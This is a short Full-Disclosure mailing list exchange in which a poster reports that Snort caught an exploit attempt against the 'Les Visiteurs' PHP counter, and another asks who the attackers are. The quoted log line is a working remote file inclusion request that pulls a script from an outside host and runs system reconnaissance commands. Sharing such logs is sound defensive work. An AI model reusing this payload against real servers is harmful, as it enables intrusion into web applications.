This is the same set of files that I noticed last week(xfteam.net) it seems they closed their domain down? (I cannot find it) Does anyone know if these ppl are a real sec organisation? or just some kiddies ?
Cheers, Daniel. "Evert Daman" <[EMAIL PROTECTED]> wrote: > > last night snort detected this request: > > GET > /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls > > > because i patched 'les visiteurs' as described by 'matthieu peschaud' > on bugtraq on the 26 of october nothing happend, but it looks like someone > is trying to exploit this bug. > just want to mention it to this wonderfull list :) > > kind regards, > Evert _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
